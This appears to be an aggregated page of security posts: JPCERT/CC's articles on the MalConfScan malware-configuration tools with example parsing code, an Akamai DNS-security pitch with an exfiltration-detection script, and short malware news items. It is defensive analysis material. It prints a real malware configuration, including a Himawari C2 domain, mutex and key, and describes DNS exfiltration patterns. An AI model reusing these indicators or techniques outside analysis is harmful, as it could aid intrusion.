Within 24 hours of the announcement of this attack, the Nozomi Networks Labs team added new rules and signatures to the OT ThreatFeed to help detect LookBack in your environment. This means that alerts will now be triggered for suspicious activity related to the known threat, LookBack, so that you can detect and remediate quickly. For customers using OT ThreatFeed, please make sure that your systems are running the latest version (from August 2, 2019) to enable these new rules.

With cyberthreats against utilities continuing to rise, LookBack is just another reminder that there’s still much work to be done as utility companies continue to strengthen their cyber security.


The post What You Need to Know About LookBack Malware & How to Detect It appeared first on Nozomi Networks.

In malware analysis, extracting the configuration is an important step. Malware configuration contains various types of information that provide many clues for incident handling, for example communication details with other hosts and the techniques the malware uses to persist. In this article, we introduce a plugin, “MalConfScan with Cuckoo”, that automatically extracts malware configuration using MalConfScan (see the previous article) and Cuckoo Sandbox (hereafter “Cuckoo”).
This plugin is available on GitHub. Feel free to download it from the webpage below:

   JPCERTCC/MalConfScan-with-Cuckoo – GitHub
   https://github.com/JPCERTCC/MalConfScan-with-Cuckoo

About MalConfScan with Cuckoo

“MalConfScan with Cuckoo” is a plugin for Cuckoo, an open source sandbox system for dynamic malware analysis. By adding this plugin to Cuckoo, MalConfScan runs inside Cuckoo, enabling automatic extraction of malware configuration. Figure 1 shows how Cuckoo behaves when “MalConfScan with Cuckoo” is installed.

Figure 1: Behaviour of “MalConfScan with Cuckoo”

“MalConfScan with Cuckoo” runs malware on the host machine to extract configuration. When malware is registered on Cuckoo and executed on the host machine, a memory image will be dumped, from which MalConfScan extracts configuration of known malware. Extracted configuration will then be shown in a report. Please see the previous article or the following page for the list of malware that this tool supports.

   JPCERTCC/MalConfScan – GitHub
   https://github.com/JPCERTCC/MalConfScan/

Instruction and report example

First, upload the malware to a Cuckoo instance that has “MalConfScan with Cuckoo” installed, using the web GUI or the command line. The official Cuckoo documentation [1] provides details about the upload procedure. When the upload and analysis are completed, a report will be provided as in Figure 2.

Figure 2: Report of “MalConfScan with Cuckoo”

Figure 2 shows the configuration of malware Himawari, a variant of RedLeaves which is used in targeted attacks. It is a kind of bot, and the configuration contains C&C server, destination port, protocol, encryption key etc. In this way, “MalConfScan with Cuckoo” can easily extract configuration for known malware.
Additionally, the results can also be obtained in JSON format. report.json records the following data:

"malconfscan": {
    "data": [
        {
            "malconf": [
                [
                    {"Server1": "diamond.ninth.biz"},
                    {"Server2": "diamond.ninth.biz"},
                    {"Server3": "diamond.ninth.biz"},
                    {"Server4": "diamond.ninth.biz"},
                    {"Port": "443"},
                    {"Mode": "TCP and HTTP"},
                    {"ID": "2017-11-28-MACRO"},
                    {"Mutex": "Q34894iq"},
                    {"Key": "usotsuki"},
                    {"UserAgent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)"},
                    {"Proxy server": ""},
                    {"Proxy username": ""},
                    {"Proxy password": ""}
                ]
            ],
            "vad_base_addr": "0x04521984",
            "process_name": "iexplore.exe",
            "process_id": "2248",
            "malware_name": "Himawari",
            "size": "0x00815104"
        }
    ]
}
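The report.json layout above is what an analyst would consume downstream. As an added example (not part of JPCERT/CC's plugin), here is a small Python 3 helper that walks the malconfscan section, merges the list-of-single-key-dicts form into one record per detected process, drops empty fields such as the proxy entries, and de-duplicates the Server1..Server4 values into a single C2 indicator. The embedded sample report is constructed from the fragment above, not taken from a real Cuckoo run.

```python
import json
from collections import OrderedDict

# Constructed sample, assembled from the report.json fragment above
# (not the output of a real Cuckoo analysis).
SAMPLE_REPORT = {
    "malconfscan": {
        "data": [
            {
                "malconf": [[
                    {"Server1": "diamond.ninth.biz"},
                    {"Server2": "diamond.ninth.biz"},
                    {"Server3": "diamond.ninth.biz"},
                    {"Server4": "diamond.ninth.biz"},
                    {"Port": "443"},
                    {"Mode": "TCP and HTTP"},
                    {"ID": "2017-11-28-MACRO"},
                    {"Mutex": "Q34894iq"},
                    {"Key": "usotsuki"},
                    {"UserAgent": "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; "
                                  "Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; "
                                  ".NET CLR 3.0.30729; .NET4.0C; .NET4.0E)"},
                    {"Proxy server": ""},
                    {"Proxy username": ""},
                    {"Proxy password": ""},
                ]],
                "vad_base_addr": "0x04521984",
                "process_name": "iexplore.exe",
                "process_id": "2248",
                "malware_name": "Himawari",
                "size": "0x00815104",
            }
        ]
    }
}


def flatten_malconf(malconf):
    """malconfscan stores a config as a list of lists of single-key dicts.
    Merge them into one ordered mapping; a repeated key keeps its first value."""
    merged = OrderedDict()
    for group in malconf:
        for entry in group:
            for key, value in entry.items():
                merged.setdefault(key, value)
    return merged


def extract_indicators(report):
    """Return (malware_name, pid, process_name, kind, value) tuples for every
    detected process in the malconfscan section.  Empty values are skipped and
    server entries are de-duplicated, so Server1..Server4 that all point at the
    same host yield exactly one 'c2' indicator."""
    results = []
    for hit in report.get("malconfscan", {}).get("data", []):
        cfg = flatten_malconf(hit.get("malconf", []))
        base = (hit.get("malware_name", "?"),
                hit.get("process_id", "?"),
                hit.get("process_name", "?"))
        seen_servers = set()
        for key, value in cfg.items():
            if not value:           # e.g. the empty proxy fields
                continue
            if key.lower().startswith("server"):
                if value in seen_servers:
                    continue
                seen_servers.add(value)
                kind = "c2"
            elif key == "Port":
                kind = "port"
            elif key == "Mutex":
                kind = "mutex"
            elif key == "UserAgent":
                kind = "user_agent"
            else:
                kind = "config"     # Mode, ID, Key and anything else
            results.append(base + (kind, value))
    return results


def indicators_by_kind(report, kind):
    """Convenience filter: just the values of one indicator kind."""
    return [row[4] for row in extract_indicators(report) if row[3] == kind]


def load_report(path):
    """Load a Cuckoo report.json from disk (path is caller-supplied)."""
    with open(path) as fh:
        return json.load(fh)


if __name__ == "__main__":
    for row in extract_indicators(SAMPLE_REPORT):
        print("%s pid=%s (%s) %-10s %s" % row)
```

Pointing load_report at a real report.json from an analysis run gives the same tuples for every process MalConfScan flagged, ready to feed a blocklist or a hunting query.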

How to install

The following steps are required before installing “MalConfScan with Cuckoo”:

Install MalConfScan
Apply patches for Cuckoo
Change configuration of Cuckoo

For more information about how to install the tool, please see our wiki on the GitHub:

   MalConfScan-with-Cuckoo Wiki – GitHub
   https://github.com/JPCERTCC/MalConfScan-with-Cuckoo/wiki

Tested environment:

Ubuntu 18.04
Python 2.7.16
Cuckoo 2.0.6
Volatility 2.6

A blog article by @soji256 explains procedures to install “MalConfScan with Cuckoo”, which can be a good reference.

   Installing the MalConfScan with Cuckoo to Analyze Emotet – Medium
   https://medium.com/@soji256/build-a-malconfscan-with-cuckoo-environment-to-analyze-emotet-ff0c4c589afe

In closing

This plugin enables extracting the configuration of known malware from a sandbox. Even when malware has anti-VM or anti-sandbox functions, we can still extract the configuration by spoofing some environmental information.
We will present the details of “MalConfScan” and “MalConfScan with Cuckoo” at the coming Black Hat USA 2019 Arsenal [3]. Feel free to stop by if you are attending Black Hat USA 2019; we look forward to active discussion and feedback from analysts.

Tomoaki Tani (Translated by Yukako Uchida)

[1] Cuckoo Docs – Submit an Analysis https://cuckoo.sh/docs/usage/submit.html

[2] “Abnormal Encryption of Himawari” – Japan Security Analyst Conference [Japanese] https://www.jpcert.or.jp/present/2018/JSAC2018_01_nakatsuru.pdf

[3] MalConfScan with Cuckoo: Automatic Malware Configuration Data Extraction and Memory Forensic – Black Hat USA 2019 https://www.blackhat.com/us-19/arsenal/schedule/index.html#malconfscan-with-cuckoo-automatic-malware-configuration-data-extraction-and-memory-forensic-16914

Every day, new types of malware are discovered. However, many of them are actually variants of existing malware: they share most of their code and differ only slightly in configuration, such as the C&C servers. This means that malware analysis is largely complete once the configuration has been extracted from the malware.
In this article, we introduce the details of “MalConfScan”, a tool for extracting malware configuration, developed by JPCERT/CC. This tool is available on GitHub. Feel free to download it from the webpage below:

JPCERTCC/MalConfScan – GitHub https://github.com/JPCERTCC/MalConfScan

Read the Wiki to learn how to install the tool:
MalConfScan wiki – GitHub https://github.com/JPCERTCC/MalConfScan/wiki

About MalConfScan

MalConfScan is a plugin for The Volatility Framework (hereafter “Volatility”), a memory forensics tool. In most cases, malware analysis begins with unpacking the malware to extract its configuration. MalConfScan extracts configuration from unpacked executables loaded in memory.
MalConfScan can perform the following functions:

malconfscan: Extract configuration of known malware from a memory image
malstrscan: Detect suspicious processes in a memory image and list the strings they refer to
malconfscan

Figure 1 is an example of malconfscan execution. First, a malware-injected process name (Name), the process ID (PID) and the name of the detected malware (Malware Name) are displayed. Malware configuration (Config info) is also displayed.

Figure 1: malconfscan execution result (detected “Lavender”, a RedLeaves variant)

malconfscan also decodes encoded strings and displays DGA domains. Figure 2 is the result where malconfscan detected Bebloh. DGA domains are listed following the configuration.

Figure 2: malconfscan execution result (detected Bebloh)

As of 30 July 2019, malconfscan is compatible with 25 types of malware. See Appendix for supported malware.

malstrscan

malstrscan detects Process Hollowing in memory and lists the strings that the process refers to. Although malware configuration is usually encoded, the malware decodes it when referring to the information, and the decoded data is sometimes left in memory. This function can pick up such leftover configuration. Figure 3 is an example of malstrscan execution.

Figure 3: malstrscan execution results

malstrscan lists strings only from the memory space where the PE file is loaded. With ‘-a’ option, it can also list strings in heap and parent memory space.

In closing

malconfscan can be used for malware analysis and memory forensics. We hope that this tool helps incident investigation. We plan to update this tool in the future to make it compatible with many other types of malware.
In the next article, we will install this tool in Cuckoo Sandbox to automatically extract malware configuration.

Shusei Tomonaga
(Translated by Yukako Uchida)

Appendix A Malware Compatible with MalConfScan

Table 1: Compatible malware
Malware
Ursnif
HawkEye Keylogger
Emotet
Lokibot
Smoke Loader
Bebloh
Poison Ivy
AZORult
CobaltStrike
NanoCore RAT
NetWire
AgentTesla
PlugX
FormBook
RedLeaves
NodeRAT
TSCookie
njRAT
TSC_Loader
TrickBot
xxmm
Remcos
Datper
QuasarRAT
Ramnit

The list of malware variants identified in June shows a return of WannaCry and Tinba activity.

The trend is still that the ten most frequently identified variants account for more than 60 percent of all malware identifications.

The distribution of the most frequently occurring malware names for June 2019 looks as follows:

Security researchers from Palo Alto Networks’ Unit 42 team have discovered the macOS malware CookieMiner, designed to “steal” the cookies associated with cryptocurrency exchange websites.

There are two types of companies: Those who have been hacked, and those who don’t yet know they have been hacked.

With data breaches frequently making the news and causing panic among network administrators, the above statement by former Cisco boss John Chambers in 2015 certainly doesn’t seem far-fetched. I don’t remember a week in 2018 going by where I wasn’t learning of a data breach and how sophisticated the attack was. Well, except for the time I didn’t have internet access while visiting the Salt Cathedral of Zipaquirá, and I couldn’t understand why. Then, there was the time I had no access on a cruise, but I digress.

The consequences of a data breach are far reaching and include the tangible and intangible. It should come as no surprise that information security is the top concern for CISOs and CIOs of companies. Some of these companies are embracing cloud-native initiatives that have improved organizational agility, reduced products’ time-to-market, and leveled the playing field with respect to computational power. However, they lose visibility into the expanded environment, causing concerns over whether they can adequately secure their cloud environment the way they would their traditional network.

These well-founded concerns are understandable. The traditional network security solutions used to combat the current cyber-crime wave have only increased complexity and risk for businesses. Fraudsters have amped up their phishing techniques to deploy sophisticated malware on network devices (human-controlled and otherwise), whether as part of ransomware campaigns, to steal sensitive data, or for other criminal activities.

It's far more important to keep an eye on what's traveling out of the network. ... Today, malicious actors aren't interested in scaling the castle wall and capturing the flag. They want to exfiltrate the flag.[2]

We should always remind ourselves of the statement above by John Kindervag and include in our focus ways to prevent data exfiltration to unauthorized destinations from our network. Companies have typically relied on endpoint solutions, in addition to other network controls, to protect against malware used for that purpose. However, to combat today's cyber-criminals, companies need to embrace a defense-in-depth security strategy in which every network layer used to access data is secured, and that includes the DNS layer. DNS is an often overlooked layer for security, yet it is integral to network functionality. It is the protocol we use to locate resources on a network: to reach our favorite news or social media websites, to find printers and storage devices, to reach the security cameras in the data center, and even to send email. It is also what unsuspecting victims use to reach phishing websites from which malware is downloaded, and what malware uses to locate its command-and-control servers on the internet. Those servers can be the destination for data stolen from digital assets inside the company (data which can itself be carried out over the DNS protocol), or the source of the keys used to encrypt digital assets in a ransomware attack.

And so, it’s wise and imperative to secure the DNS layer as part of a defense-in-depth security strategy. As a security control point, DNS layer security offers a proactive way to uniformly and immediately block malicious domains and communications for all of your users, whether they are on or off network. It can also deliver lower latency, fewer broken sites and apps, and improved network performance.


These are the drivers for the Akamai Enterprise Threat Protector (ETP) solution. ETP is a Secure Internet Gateway that delivers advanced threat protection in the cloud for all of your users, wherever they are, and serves as their safe on-ramp to the internet. ETP uses multiple layers of protection — DNS, URL, and inline payload analysis — to provide security with reduced complexity and without impacting performance. Companies simply direct their recursive DNS traffic to Enterprise Threat Protector's global servers, where every requested domain is checked against Akamai's real-time domain risk scoring threat intelligence. Safe domains are resolved as normal, malicious domains are blocked, and risky domains are sent to a smart selective proxy where the HTTP or HTTPS URLs are inspected to determine whether they are malicious. The HTTP and HTTPS payloads from risky domains are then scanned in real time using multiple advanced malware-detection engines.
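The three-way decision described above (safe domains resolved, malicious domains blocked, risky domains handed to an inspecting proxy) is straightforward to express as resolver policy. The following is an added example written for this page, not Akamai's or ETP's code: it applies a constructed threat-intel table to constructed resolver log lines and adds a heuristic for the DNS-carried exfiltration the text mentions, flagging query names whose labels are unusually long and high-entropy. All domain names, risk scores, thresholds and the log format are made up for the example; a real deployment would use live scoring and tune the thresholds to its own traffic.

```python
"""DNS-layer policy check over constructed resolver log lines.

Added example, not Akamai's or ETP's code. Models the resolve/block/inspect
decision against a constructed risk-score table, plus a simple heuristic for
DNS-based data exfiltration (long, high-entropy labels).
"""
import math
import re
from collections import Counter

# Constructed threat-intel table: domain -> risk score in [0, 100].
# Names and scores are made up; real products use live scoring.
RISK_SCORES = {
    "news.example.com": 2,
    "printer.corp.example": 0,
    "c2-example.invalid": 97,
    "maybe-bad.example.net": 55,
}

BLOCK_THRESHOLD = 90    # score >= this: refuse to resolve
INSPECT_THRESHOLD = 40  # score >= this (and below BLOCK): route via inspecting proxy

# Constructed resolver log: "<timestamp> <client_ip> <qtype> <qname>" per line.
SAMPLE_LOG = """\
2019-06-03T10:00:01Z 10.0.0.12 A news.example.com
2019-06-03T10:00:02Z 10.0.0.12 A c2-example.invalid
2019-06-03T10:00:03Z 10.0.0.15 A maybe-bad.example.net
2019-06-03T10:00:04Z 10.0.0.15 A printer.corp.example
2019-06-03T10:00:05Z 10.0.0.20 TXT 4a6f686e20446f653a203132333435.3f8a1c9e7b2d4f60a1b3.data.example.org
"""

LOG_RE = re.compile(r"^(\S+)\s+(\S+)\s+(\S+)\s+(\S+)$")


def lookup_score(qname: str) -> int:
    """Walk from the full name up through its parents so a child inherits a
    parent's score. Unknown names score 0 (assumption for this example)."""
    labels = qname.rstrip(".").lower().split(".")
    for i in range(len(labels)):
        candidate = ".".join(labels[i:])
        if candidate in RISK_SCORES:
            return RISK_SCORES[candidate]
    return 0


def shannon_entropy(text: str) -> float:
    """Bits per character of the label; 0.0 for an empty string."""
    if not text:
        return 0.0
    n = len(text)
    return -sum(c / n * math.log2(c / n) for c in Counter(text).values())


def looks_like_exfil(qname: str) -> bool:
    """Heuristic (constructed thresholds): a very long query name, or any label
    that is both long and high-entropy, resembles data tunnelled out over DNS."""
    name = qname.rstrip(".")
    if len(name) > 60:
        return True
    return any(len(lbl) >= 24 and shannon_entropy(lbl) >= 3.0
               for lbl in name.split("."))


def decide(qname: str) -> tuple:
    """Return (action, reason) for a single query name."""
    if looks_like_exfil(qname):
        return ("block", "exfil-heuristic")
    score = lookup_score(qname)
    if score >= BLOCK_THRESHOLD:
        return ("block", "risk-score")
    if score >= INSPECT_THRESHOLD:
        return ("inspect", "risk-score")
    return ("resolve", "risk-score")


def process_log(log_text: str) -> list:
    """Parse each log line and attach the policy decision; skips malformed lines."""
    results = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line.strip())
        if not m:
            continue
        ts, client, qtype, qname = m.groups()
        action, reason = decide(qname)
        results.append({"ts": ts, "client": client, "qtype": qtype,
                        "qname": qname, "action": action, "reason": reason})
    return results


if __name__ == "__main__":
    for r in process_log(SAMPLE_LOG):
        print(f"{r['client']:<10} {r['action']:<8} {r['reason']:<16} {r['qname']}")
```

The parent-walk in `lookup_score` matters in practice: scoring only exact names lets a single unknown subdomain of a known-bad domain slip past, so a child inherits its parent's score unless it has one of its own. The exfiltration heuristic is deliberately checked first, because a name the threat feed has never seen is exactly what a tunnelling client generates.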

ETP improves security defenses. It reduces security complexity and increases the efficiency of security teams. Find out more here.

In March 2018 the URLhaus project was launched by abuse.ch, a non-profit cyber-security organisation based in Switzerland.

The purpose of URLhaus is to collect URLs of sites that distribute malware, and after ten months of work the collaboration has now taken down no fewer than 100,000 sites.

256 security researchers spread across the world report malware sites to URLhaus every day, and in that way they help protect internet users against malware campaigns.


“A First Look at the Crypto-Mining Malware Ecosystem: A Decade of Unrestricted Wealth” https://t.co/ggSw5PG4Bh #cryptomining #malware

Security researchers at Malwarebytes have identified a new macOS malware, dubbed DarthMiner, which combines the functionality of the EmPyre backdoor and the XMRig cryptominer.